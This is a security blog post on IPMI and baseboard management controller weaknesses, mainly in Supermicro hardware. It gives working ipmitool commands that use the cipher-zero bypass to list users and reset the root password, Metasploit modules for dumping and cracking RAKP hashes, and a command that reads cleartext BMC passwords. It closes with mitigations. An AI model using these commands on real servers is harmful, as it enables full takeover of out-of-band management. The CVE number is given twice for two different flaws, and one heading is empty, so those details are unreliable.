Backdoor in the Backplane. Doing IPMI security better

TL;DR

• IPMI, released by Intel in 1998, is a hardware management interface operating independently of the OS, often using 623/udp.
• It monitors hardware data (e.g., temperature, power) and supports remote recovery, integrated into BMCs like HP iLO, Dell DRAC, and others.
• IPMI vulnerabilities include authentication bypasses, credential leaks, and buffer overflows, particularly in Supermicro systems.
• Mitigations include using complex passwords, isolating IPMI on restricted networks, and regularly updating firmware despite infrequent patches.

What is IPMI and how is it used?

Released by INTEL in 1998, IPMI (Intelligent Platform Management Interface) is a set of specifications that lay out communication protocols across both local buses as well as the network operating on 623/udp typically but sometimes on TCP.

IPMI messaging can be used for monitoring uses of hardware level data from sensors picking up temperatures, power supply and other hardware-based voltages. It can even be used for recovery purposes in the event of an OS becoming unusable due to its ability to be used in the absence of the system management software.

Overall, IPMI is often integrated into hardware controllers, known as  BMC (Base Management Controller) which are sold under a wide variety of brands such as HP iLO, Dell DRAC, Sun ILOM, Fujitsu IRMC, IBM IMM and Supermicro IPMI. As it is  independent of the OS, it can be used without the computer being powered on as long as it is connected to a LAN network and a power supply at the discretion of the system admin, or one would think.

Common IPMI vulnerabilities

CVE-2019-16649

On Supermicro H11, H12, M11, X9, X10, and X11 products, a combination of encryption and authentication problems in the virtual media service allows capture of BMC credentials and data transferred over virtual media devices. Attackers can use captured credentials to connect virtual USB devices to the server managed by the BMC.

CVE-2019-16649

On Supermicro X10 and X11 products, a client’s access privileges may be transferred to a different client that later has the same socket file descriptor number. In opportunistic circumstances, an attacker can simply connect to the virtual media service, and then connect virtual USB devices to the server managed by the BMC.

CVE-2013-4782

The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password. This is a rating 10.0 on CVSS and also comes with its own Metasploit module which I will detail in the next section.

Overall there are 8 reports for Supermicro alone using IPMI of which 6 are rated critical. A large portion of these vulnerabilities are through buffer overflow which has been a trend all the way from 2013 to 2017.

Here is the link to the CVE website detailing these further:   https://www.cvedetails.com/vulnerability-list/vendor_id-12753/Supermicro.html

Methods for enumerating IPMI

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

Developed by Dan Farmer, this Metasploit module identifies IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability using cipher zero.

Use this module for identifying the issue.

msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > show actions   
   ...actions...
msf auxiliary(ipmi_cipher_zero) > set ACTION < action-name >
msf auxiliary(ipmi_cipher_zero) > show options
   ...show and set options...
msf auxiliary(ipmi_cipher_zero) > run

This can be abused by using ipmitool:

apt-get install ipmitool #Install#
Using -C 0 any password is accepted
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 root true true true ADMINISTRATOR
3 Oper1 true true true ADMINISTRATOR
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

This vulnerability allows one to ask the server for the MD5 and SHA1 hashes of any username and if the username exists, then those hashes will be sent back. The output can be selected for John or Hashcat format in the options. A list of usernames is required which Metasploit pre-determines for you, but these can be changed if required.

Hashcat has the ability to crack RAKP hashes built in whereas John does not without the ‘bleeding-jumbo’ branch detailed here:

$ git clone https://github.com/magnumripper/JohnTheRipper.git
$ cd JohnTheRipper
$ git checkout bleeding-jumbo
$ cd src$ make linux-x86-64
$ cd ../run
$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john

Now onto using the module itself, found at:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

ipmitool can then be used to bypass the authentication -c 0 to change the root password similarly to before, to abc123 or whatever the desired password:

apt-get install ipmitool #Install
#Using -C 0 any password is accepted
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 root true true true ADMINISTRATOR
3 Oper1 true true true ADMINISTRATOR
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123

If you would like to test these on a simulated server use this command to install:

$ docker pull vaporio/ipmi-simulator

Supermicro IPMI clear text passwords

IPMI 2.0 specifies that the BMC is to respond to HMAC (Hash Based Message Authentication Code) methods such as SHA1 and MD5. Shown in the examples previously, this poses some significant weaknesses as they are easily decrypted. However, this also means that it requires access to the clear text password stored in order to calculate the authentication hash.

So, the BMC must store a clear-text version of all configured user passwords somewhere in non-volatile storage but, with Supermicro, the location changes between the different firmware versions. The locations are either /nv/PSBlock or /nv/PSStore. The passwords are scattered between bits of binary code but they all follow the same username so can be found fairly easily. This can become problematic when passwords are shared between BMC’s or devices:

cat /nv/PSBlock
admin         ADMINpassword^TT      rootOtherPassword!

Default passwords:

How to prevent attacks

Due to the insecure nature of IPMI it is very difficult to prevent attacks as well as the fact that IPMI is rarely patched.

Complex and long passwords will make it harder to decrypt which will make it more secure, or perhaps isolating the IPMI to a network only reachable by a VPN.

Conclusion

IPMI remains a powerful but dangerously overlooked protocols in many enterprise environments. Whilst its ability to manage out of band systems is invaluable, there are significant security trade-offs – especially when outdated firmware, default credentials, and exposed interfaces are in play. As demonstrated, IPMI can lead, or aid, in a malicious actor compromising the full domain with little more than network access.

As a result, organisations, regardless of their size and standing, should always take a proactive approach with practices such as enforcing strong authentication, isolating IPMI interfaces on secure VLANs, disabling unused features like virtual media and auditing firmware version more regularly.

Sources

• https://book.hacktricks.xyz/pentesting/623-udp-ipmi
• https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/
• https://www.computerworld.com/article/2708437/ipmi–the-most-dangerous-protocol-you-ve-never-heard-of.html
• https://www.supermicro.com/en/support/security_BMC_virtual_media
• https://cve.mitre.org/